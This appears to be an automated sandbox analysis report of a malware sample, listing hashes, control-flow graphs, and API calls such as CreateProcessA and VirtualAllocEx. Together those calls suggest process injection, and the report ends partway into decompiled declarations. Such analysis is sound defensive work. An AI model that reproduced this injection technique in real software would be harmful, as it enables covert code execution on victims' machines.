      • Opcode ID: d820be5a321a6eeea8edd622642f0645f775ad203e816a2959225a46689ae1bb
      • Instruction ID: a6b99c594b4abb74e7c9bff3dee9d1ce57de9df68418ad586c62100e67dce151
      • Opcode Fuzzy Hash: d820be5a321a6eeea8edd622642f0645f775ad203e816a2959225a46689ae1bb
      • Instruction Fuzzy Hash: 4232F075A00218DFDB15CFA5C980E99BBB2FF49304F1580E9E609AB361DB31AE91DF50
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 573 2e5610-2e563c 574 2e563e 573->574 575 2e5643-2e5695 573->575 574->575 577 2e5a7f-2e5a85 575->577 578 2e5a8e-2e5aa5 call 2e4e28 577->578 579 2e5a87 577->579 578->577 603 2e5aa7-2e5aca 578->603 579->578 580 2e57af-2e57d8 579->580 581 2e584c-2e586b 579->581 582 2e579c-2e579d 579->582 583 2e59cd-2e59eb 579->583 584 2e5b9d-2e5b9e 579->584 585 2e5bbb-2e5bbc 579->585 586 2e59b6-2e59ba 579->586 587 2e5b42-2e5b48 579->587 588 2e5b60-2e5b68 579->588 589 2e5c41-2e5c64 call 2e55a0 call 2e4e28 579->589 606 2e57df-2e57ea 580->606 607 2e57da 580->607 608 2e598d-2e59b1 581->608 609 2e5871-2e58a9 581->609 582->585 612 2e59ed 583->612 613 2e59f2-2e5a06 583->613 596 2e5c7a-2e5c87 584->596 585->587 594 2e5780-2e5786 586->594 595 2e59c0-2e59c8 586->595 592 2e5bbe-2e5be7 587->592 593 2e5b4a-2e5b5b 587->593 601 2e5b74-2e5b8e 588->601 625 2e5c6a-2e5c72 589->625 626 2e57a2-2e57aa 589->626 616 2e5bee-2e5bf9 592->616 617 2e5be9 592->617 593->577 614 2e578e-2e5799 594->614 595->577 610 2e5ba3-2e5ba7 601->610 611 2e5b90-2e5b98 601->611 629 2e5acc 603->629 630 2e5ad1-2e5adc 603->630 619 2e57ec 606->619 620 2e57f1-2e57f6 606->620 607->606 608->577 621 2e58ab 609->621 622 2e58b0-2e58ea 609->622 623 2e5bae-2e5bb6 610->623 624 2e5ba9 610->624 611->577 612->613 671 2e5a0b call 2e5f8a 613->671 672 2e5a0b call 2e5f42 613->672 614->582 632 2e5bfb 616->632 633 2e5c00-2e5c05 616->633 617->616 619->620 627 2e57fd-2e5847 620->627 628 2e57f8 620->628 621->622 649 2e58ec 622->649 650 2e58f1-2e58ff 622->650 623->577 624->623 625->577 625->596 626->577 627->577 628->627 629->630 635 2e5ade 630->635 636 2e5ae3-2e5ae8 630->636 632->633 637 2e5c0c-2e5c3c 633->637 638 2e5c07 633->638 635->636 642 2e5aef-2e5b28 636->642 643 2e5aea 636->643 637->577 638->637 640 2e5a11-2e5a25 646 2e5a2b-2e5a69 640->646 660 2e5b2f-2e5b3d 642->660 661 2e5b2a 642->661 643->642 663 2e5a6b 646->663 664 2e5a70-2e5a7a 646->664 649->650 651 2e5906-2e5941 650->651 652 2e5901 650->652 665 2e5948-2e5956 651->665 666 2e5943 651->666 652->651 660->577 661->660 663->664 664->580 667 2e595d-2e5987 665->667 668 2e5958 665->668 666->665 667->608 668->667 671->640 672->640
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e398199f0664df86d414208b93630f178926db4e9e650941da606df84ca59300
      • Instruction ID: 315a8e2177ab9b53ff587f891c6f0bc1977b7507a2802d1a5654dbec207a27c7
      • Opcode Fuzzy Hash: e398199f0664df86d414208b93630f178926db4e9e650941da606df84ca59300
      • Instruction Fuzzy Hash: C7F17E74E24229CFDB54DFA5C884BADB7B1BF88319F9481A9D909A7340DB745E84CF20
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c71cbdf520043d415a4a040a2c68e776052421a5be9236aad00b26d26893f853
      • Instruction ID: e9b5e0fdc3307d0588e50966737f352770d78a77c26dfeae6c72141a7efe8337
      • Opcode Fuzzy Hash: c71cbdf520043d415a4a040a2c68e776052421a5be9236aad00b26d26893f853
      • Instruction Fuzzy Hash: 06519575E05258CFDB19CFA6D980ACDBBF2AF89300F15D1EAD408AB225DB305A85CF11
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 56 2e7ef5-2e7f99 58 2e7ffb-2e8023 56->58 59 2e7f9b-2e7fcb 56->59 62 2e8025-2e8052 58->62 63 2e8082-2e80d8 58->63 59->58 65 2e7fcd-2e7fd2 59->65 62->63 75 2e8054-2e8059 62->75 70 2e80da-2e8107 63->70 71 2e8137-2e8225 CreateProcessA 63->71 68 2e7fd4-2e7fde 65->68 69 2e7ff5-2e7ff8 65->69 72 2e7fe2-2e7ff1 68->72 73 2e7fe0 68->73 69->58 70->71 86 2e8109-2e810e 70->86 95 2e822e-2e8313 71->95 96 2e8227-2e822d 71->96 72->72 76 2e7ff3 72->76 73->72 79 2e807c-2e807f 75->79 80 2e805b-2e8065 75->80 76->69 79->63 81 2e8069-2e8078 80->81 82 2e8067 80->82 81->81 85 2e807a 81->85 82->81 85->79 88 2e8110-2e811a 86->88 89 2e8131-2e8134 86->89 90 2e811e-2e812d 88->90 91 2e811c 88->91 89->71 90->90 92 2e812f 90->92 91->90 92->89 108 2e8315-2e8319 95->108 109 2e8323-2e8327 95->109 96->95 108->109 110 2e831b 108->110 111 2e8329-2e832d 109->111 112 2e8337-2e833b 109->112 110->109 111->112 113 2e832f 111->113 114 2e833d-2e8341 112->114 115 2e834b-2e834f 112->115 113->112 114->115 118 2e8343 114->118 116 2e8385-2e8390 115->116 117 2e8351-2e837a 115->117 122 2e8391 116->122 117->116 118->115 122->122
      APIs
      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E8212
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: CreateProcess
      • String ID:
      • API String ID: 963392458-0
      • Opcode ID: 5881cacea5e2a9388d41ed00a9d7ddedbc3630737c8d8b1ea01af68d2bdd31e4
      • Instruction ID: 08be38e6574a7375807feffb2339e8daaa91ca71fc82d446c33dac9c1a15857d
      • Opcode Fuzzy Hash: 5881cacea5e2a9388d41ed00a9d7ddedbc3630737c8d8b1ea01af68d2bdd31e4
      • Instruction Fuzzy Hash: 76D13670D0425ACFDB20CFA5C881BEDBBB1BF49304F0491A9E959B7280DB749A95CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 123 2e7f00-2e7f99 125 2e7ffb-2e8023 123->125 126 2e7f9b-2e7fcb 123->126 129 2e8025-2e8052 125->129 130 2e8082-2e80d8 125->130 126->125 132 2e7fcd-2e7fd2 126->132 129->130 142 2e8054-2e8059 129->142 137 2e80da-2e8107 130->137 138 2e8137-2e8225 CreateProcessA 130->138 135 2e7fd4-2e7fde 132->135 136 2e7ff5-2e7ff8 132->136 139 2e7fe2-2e7ff1 135->139 140 2e7fe0 135->140 136->125 137->138 153 2e8109-2e810e 137->153 162 2e822e-2e8313 138->162 163 2e8227-2e822d 138->163 139->139 143 2e7ff3 139->143 140->139 146 2e807c-2e807f 142->146 147 2e805b-2e8065 142->147 143->136 146->130 148 2e8069-2e8078 147->148 149 2e8067 147->149 148->148 152 2e807a 148->152 149->148 152->146 155 2e8110-2e811a 153->155 156 2e8131-2e8134 153->156 157 2e811e-2e812d 155->157 158 2e811c 155->158 156->138 157->157 159 2e812f 157->159 158->157 159->156 175 2e8315-2e8319 162->175 176 2e8323-2e8327 162->176 163->162 175->176 177 2e831b 175->177 178 2e8329-2e832d 176->178 179 2e8337-2e833b 176->179 177->176 178->179 180 2e832f 178->180 181 2e833d-2e8341 179->181 182 2e834b-2e834f 179->182 180->179 181->182 185 2e8343 181->185 183 2e8385-2e8390 182->183 184 2e8351-2e837a 182->184 189 2e8391 183->189 184->183 185->182 189->189
      APIs
      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E8212
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: CreateProcess
      • String ID:
      • API String ID: 963392458-0
      • Opcode ID: e3d11c349b757d7a62a84df5aad0d61f5ba763a9324154fe4d04d8a72864979b
      • Instruction ID: 6f02a3d5a88cbc156ad45d928ac3b9f25e51635071b5aa297a8b1c79b81b7c25
      • Opcode Fuzzy Hash: e3d11c349b757d7a62a84df5aad0d61f5ba763a9324154fe4d04d8a72864979b
      • Instruction Fuzzy Hash: 31D12670D1425DCFDB20CFA5C881BEDBBB1BB49304F0091A9E959B7280DB749A95CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 308 2e8880-2e8942 VirtualAllocEx 311 2e894b-2e8995 308->311 312 2e8944-2e894a 308->312 312->311
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 815f4d0af4fec1aed81805a9c495a5e063d94e70c30522eb1e506acbc9b97f05
      • Instruction ID: e05ab007746f4be3d069f2f2a8445890cbf5cf77e4b90f4d01666d69374d8a47
      • Opcode Fuzzy Hash: 815f4d0af4fec1aed81805a9c495a5e063d94e70c30522eb1e506acbc9b97f05
      • Instruction Fuzzy Hash: 923198B9D042489FCF00CFA9E884AEEFBB1BB59314F14A42AE814B7310D735A906CF54
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 317 2e8888-2e8942 VirtualAllocEx 320 2e894b-2e8995 317->320 321 2e8944-2e894a 317->321 321->320
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: a58cb263e379ea35c2165f6e209bc65bfdbf4dbc434a11c9ba8ffb13db5a7bc2
      • Instruction ID: 930c59cec4d602539d99684a7c77fb4a29a4cb9bdf8bb6db5e79162aed7d8bd4
      • Opcode Fuzzy Hash: a58cb263e379ea35c2165f6e209bc65bfdbf4dbc434a11c9ba8ffb13db5a7bc2
      • Instruction Fuzzy Hash: 613187B9D042989FCF10CFAAD884AAEFBB1FB49314F10942AE914B7310D735A945CF65
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 326 2e88f7-2e8942 VirtualAllocEx 327 2e894b-2e8995 326->327 328 2e8944-2e894a 326->328 328->327
      APIs
      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002E8932
      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: e83cf8bc2f2422e8c5f8ea16f6195b395ba9235c01039f485599f1681fd9eef6
      • Instruction ID: 2332389a6518e967a82af03c8dcae3bc37be15a7a06d9b7c9257abab6f74afa5
      • Opcode Fuzzy Hash: e83cf8bc2f2422e8c5f8ea16f6195b395ba9235c01039f485599f1681fd9eef6
      • Instruction Fuzzy Hash: 9511A775D10248AFCF00CFE9E880ADDBBB1BF08324F20845AE958A7261C776A956DF51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ff166172424a00a275859ecd01074ea0194092e1be3246116a304f009b8f322
      • Instruction ID: 226239febca0d31f764b4a1f8a2c62ddf3fd293a8f97a6ae8a3a948418b7c780
      • Opcode Fuzzy Hash: 2ff166172424a00a275859ecd01074ea0194092e1be3246116a304f009b8f322
      • Instruction Fuzzy Hash: EF21F375D082499FCF02CFA8D880AEEBBB1AF4A310F14806AE914B7351D3359955CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: aa711635f7928ab521bfa2439a12921921507cb6cf4d1f69e178db953341541c
      • Instruction ID: 2b18f11685dacb6985116b8ea4a0ca6b11b1b7f27118cad206339892e555d4f5
      • Opcode Fuzzy Hash: aa711635f7928ab521bfa2439a12921921507cb6cf4d1f69e178db953341541c
      • Instruction Fuzzy Hash: D3119E75E002199FCF05CFA8D840AEEBBF5EB49310F10942AE914B3350D7319A50DFA4
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: be9ef5113bec494676e93d4e000516447bcf11e187d3f23850ac8a8ffc9bc6f2
      • Instruction ID: 312c9222c4742fa0c5b1965e66b6fb1340d4dd12bdb1f57857a4045e62490eb3
      • Opcode Fuzzy Hash: be9ef5113bec494676e93d4e000516447bcf11e187d3f23850ac8a8ffc9bc6f2
      • Instruction Fuzzy Hash: DEF04F74909288EFCB02CF64C854A8CBFB0EF09301F1681DAE8449B362C2359A54DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7b21333abd2d1bd714d2d33ef410a293098f4491b5298352150a0996475b0c70
      • Instruction ID: 410d9b214dcc9e3e15d7b9d9b64a783ebc079abc32f153e67191dc07086ff6a3
      • Opcode Fuzzy Hash: 7b21333abd2d1bd714d2d33ef410a293098f4491b5298352150a0996475b0c70
      • Instruction Fuzzy Hash: 15F05E2050E3C4AFC702DBB49C606597FB59F43205B5A40DBE848CB1A3DA255E08D762
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1f64e0748ced493a99563881451752bdaaf19feec1741502f7937b9b65984048
      • Instruction ID: 86b29ea69e7534618de22c9a3d1de19bccbd734d456470ac46b35df6c0bef6ef
      • Opcode Fuzzy Hash: 1f64e0748ced493a99563881451752bdaaf19feec1741502f7937b9b65984048
      • Instruction Fuzzy Hash: A4F08270C0E3C89FC746DBB498106ADBFB8AF42205F1641EFD884D72A3D6384A59DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fab2636985d9890637c81f84a7439b715ffc0d63a5c7c7b75b25dd30785f7aff
      • Instruction ID: 5f3cb14e890f0989cc7155f0fd8aba4303fbbd7318ff137e5080285972abbf58
      • Opcode Fuzzy Hash: fab2636985d9890637c81f84a7439b715ffc0d63a5c7c7b75b25dd30785f7aff
      • Instruction Fuzzy Hash: A6F0A0B485E3889FC703CBB4A8546D97FB4AB02200F1604DBD848D72B3E6340E4DD761
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 00154b8d3eec3ffaa0eb5e7484f6b142a8eff1fea5a56e4bf79bba2af8737be1
      • Instruction ID: ca2e843f4422d04c6b977f0d92331e6fd67c0155c9d55f69fb1021dbe61ef8db
      • Opcode Fuzzy Hash: 00154b8d3eec3ffaa0eb5e7484f6b142a8eff1fea5a56e4bf79bba2af8737be1
      • Instruction Fuzzy Hash: 4EF08234409244AFC741DB60EC44E997F75EF06315F1681EAE9445B372C6305A58DB51
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c41e37a907210f2365d0b2c996be50eda90c6eb23ee769fa6307d7c6067abda3
      • Instruction ID: e0a165945b4a8a901cfdfc96b55fa7c8d57c99ad5890f1042d79450e29c02684
      • Opcode Fuzzy Hash: c41e37a907210f2365d0b2c996be50eda90c6eb23ee769fa6307d7c6067abda3
      • Instruction Fuzzy Hash: CAF030749492849FC741DBB4DC58B587FB4EF06205F2A40EED948CB3B3D6349A48D751
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a9c87f23b8f3ebe990acb9913d1bec646b0be439e652c672ffff16a332c0c39b
      • Instruction ID: 35e3604834987e52fe717fc96f904931071a1a68131d565cd79b008f02387df3
      • Opcode Fuzzy Hash: a9c87f23b8f3ebe990acb9913d1bec646b0be439e652c672ffff16a332c0c39b
      • Instruction Fuzzy Hash: E2F0A534904208EFCB44DFA8D944A9CBBF5EB48301F1181A9E908A7360D631AE54DF40
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: fa6fa6aa6baccfc3644ff4b172ef5885ae7eea1573b6918e27f5abbd716f3d37
      • Instruction ID: c176e4bd0f762dd8d72e1ba52abffb3cf2bd9bb2f495fa12fbbeb149bc15680c
      • Opcode Fuzzy Hash: fa6fa6aa6baccfc3644ff4b172ef5885ae7eea1573b6918e27f5abbd716f3d37
      • Instruction Fuzzy Hash: 5EE01A70D04208EFCB44DFA8D44069DBBF5EB44305F1181A9E904A3350DB355A95DF80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c050ebe55b06dd17cfda5f9b1a6682985d178491f11caa2c080ed34326c93e44
      • Instruction ID: b4aee04bdb8646e663ab4630efd5ba3a692ee77a49a10006d2762d711b5725a3
      • Opcode Fuzzy Hash: c050ebe55b06dd17cfda5f9b1a6682985d178491f11caa2c080ed34326c93e44
      • Instruction Fuzzy Hash: 2EE01A34904208EFCB44DFA4D84495CBBB5BB09315F118198F90427320C7319A94DB80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 72523828773456c515acbe178b50a5c9c26a482f6efeb55b8cc9023281e61aff
      • Instruction ID: da7eb2b802675d138f2a28efd5a87c9b721ed326bd960ee6a24d3667c7c81d11
      • Opcode Fuzzy Hash: 72523828773456c515acbe178b50a5c9c26a482f6efeb55b8cc9023281e61aff
      • Instruction Fuzzy Hash: 9CE04670D09208EFCB54EFF898012ADBBF4AB44305F2081EDD858A3350DB358B84DB80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 02786dd29a95d2ff48d463f983ab87303984ad247ee2df3473720ba5b020fb68
      • Instruction ID: befcc6fb4e73471477f62bb84732d46e21e9ee78e654e25e28654f49e9e156e6
      • Opcode Fuzzy Hash: 02786dd29a95d2ff48d463f983ab87303984ad247ee2df3473720ba5b020fb68
      • Instruction Fuzzy Hash: 6FE01270D08208AFCB44DFE8D840AADBBF4EB48300F1181AAA908A3310DB305A95DF80
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 0a5373282aec2f3197557394be39c0f436b0bfbb3edec51e314b8b20af11205b
      • Instruction ID: 2fae0d4417e85586c473964698abb3ffd773892626f7a7f98f88ecef6496b86d
      • Opcode Fuzzy Hash: 0a5373282aec2f3197557394be39c0f436b0bfbb3edec51e314b8b20af11205b
      • Instruction Fuzzy Hash: 1AE0B674904208DFC744DFA8D985A5CBBF4AB08305F2101A9E90897361EB319A84DB81
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f4a770916bbae1da26a0ee7b6f32ef60e0053165bd9c71508276b55d9f8f1379
      • Instruction ID: a05d4636d4dfb472677fa65b7b478777af5f7743942573a24dadb3546831c1db
      • Opcode Fuzzy Hash: f4a770916bbae1da26a0ee7b6f32ef60e0053165bd9c71508276b55d9f8f1379
      • Instruction Fuzzy Hash: 8CD01230A05108EFC704EBE4D94565DB3F9DB45305F2244A8A50997250DB325F44D751
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961542966.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_350000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ad78c41a6dc3c2cfb22107e6f1a53b3dc0d1aee619ac341535fbeb6ad39589a
      • Instruction ID: b8697c3c5206727b0de0067ca0872a5e38c33b56fe78b2438cea4c1fc537372a
      • Opcode Fuzzy Hash: 2ad78c41a6dc3c2cfb22107e6f1a53b3dc0d1aee619ac341535fbeb6ad39589a
      • Instruction Fuzzy Hash: 5FE0EC70904208DFCB44DFA8D94475CBBB4AB04205F2101A99908A3360EB305A94DB91
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 74%
      			E003358D3(intOrPtr* __eax, intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
      				signed int _t296;
      				signed char _t304;
      				signed int _t305;
      				signed int _t310;
      				intOrPtr* _t311;
      				signed int _t313;
      				signed char _t315;
      				signed int _t317;
      				signed int _t318;
      				signed int _t319;
      				signed int _t320;
      				signed int _t321;
      				intOrPtr* _t322;
      				intOrPtr* _t323;
      				signed int _t324;
      				intOrPtr* _t325;
      				intOrPtr* _t326;
      				signed int _t329;
      				signed char _t332;
      				signed int _t333;
      				signed int _t334;
      				signed char _t337;
      				intOrPtr* _t340;
      				intOrPtr* _t341;
      				signed char _t345;
      				intOrPtr* _t348;
      				signed char _t352;
      				intOrPtr* _t353;
      				intOrPtr* _t354;
      				signed char _t357;
      				signed char _t358;
      				signed char _t359;
      				signed char _t360;
      				signed char _t361;
      				signed char _t362;
      				signed char _t363;
      				intOrPtr* _t364;
      				signed char _t366;
      				intOrPtr* _t367;
      				intOrPtr* _t368;
      				signed char _t369;
      				signed char _t370;
      				signed char _t371;
      				signed int _t373;
      				signed char _t375;
      				signed char _t376;
      				intOrPtr* _t378;
      				signed char _t379;
      				signed char _t380;
      				signed char _t381;
      				signed char _t382;
      				signed char _t383;
      				signed char _t384;
      				signed char _t385;
      				signed char _t387;
      				signed char _t388;
      				void* _t389;
      				intOrPtr* _t390;
      				intOrPtr* _t391;
      				signed char _t392;
      				signed char _t393;
      				intOrPtr* _t394;
      				intOrPtr* _t395;
      				signed char _t396;
      				signed char _t397;
      				signed char _t398;
      				intOrPtr* _t399;
      				intOrPtr* _t400;
      				intOrPtr* _t401;
      				intOrPtr* _t402;
      				intOrPtr* _t403;
      				intOrPtr* _t404;
      				intOrPtr* _t405;
      				intOrPtr* _t406;
      				intOrPtr* _t407;
      				signed char* _t408;
      				intOrPtr* _t409;
      				intOrPtr* _t410;
      				intOrPtr* _t411;
      				intOrPtr* _t412;
      				intOrPtr* _t413;
      				signed char _t414;
      				signed char _t415;
      				signed char _t416;
      				signed char _t417;
      				intOrPtr* _t418;
      				intOrPtr* _t419;
      				intOrPtr* _t420;
      				signed char _t421;
      				signed int _t423;
      				intOrPtr* _t426;
      				void* _t427;
      				intOrPtr* _t428;
      				signed int _t429;
      				signed int _t430;
      				signed int _t431;
      				signed int _t432;
      				intOrPtr* _t433;
      				intOrPtr* _t434;
      				intOrPtr* _t435;
      				intOrPtr* _t436;
      				intOrPtr* _t437;
      				intOrPtr* _t445;
      				intOrPtr* _t446;
      				void* _t447;
      				intOrPtr* _t448;
      				signed char _t449;
      				signed char _t450;
      				intOrPtr _t452;
      				intOrPtr* _t453;
      				intOrPtr* _t454;
      				intOrPtr* _t455;
      				intOrPtr* _t456;
      				signed int _t458;
      				signed int _t461;
      				signed int _t462;
      				signed int _t463;
      				signed int _t465;
      				void* _t466;
      				intOrPtr* _t468;
      				void* _t470;
      				intOrPtr* _t472;
      				void* _t473;
      				void* _t474;
      				signed int* _t480;
      				intOrPtr* _t481;
      				intOrPtr* _t482;
      				intOrPtr* _t483;
      				void* _t484;
      				intOrPtr* _t485;
      				intOrPtr* _t487;
      				signed char _t488;
      				void* _t489;
      				void* _t492;
      				intOrPtr* _t498;
      				intOrPtr* _t499;
      				void* _t500;
      				void* _t501;
      				void* _t502;
      				void* _t503;
      				void* _t504;
      				intOrPtr* _t505;
      				void* _t508;
      				intOrPtr* _t510;
      				intOrPtr* _t512;
      				void* _t516;
      				signed char _t518;
      				void* _t519;
      				void* _t520;
      				void* _t521;
      				void* _t522;
      				void* _t523;
      				void* _t524;
      				signed int* _t525;
      				void* _t527;
      				void* _t529;
      				void* _t530;
      				intOrPtr* _t533;
      				void* _t534;
      				intOrPtr* _t536;
      				intOrPtr* _t537;
      				intOrPtr* _t538;
      				void* _t539;
      				void* _t540;
      				signed int _t541;
      				signed int _t551;
      				signed int _t553;
      				signed char* _t554;
      				void* _t555;
      				intOrPtr* _t556;
      				intOrPtr* _t557;
      				intOrPtr* _t558;
      				intOrPtr* _t559;
      				intOrPtr* _t563;
      				void* _t575;
      				void* _t576;
      
      				_t540 = __esi;
      				_t489 = __edx;
      				_t536 = __eax;
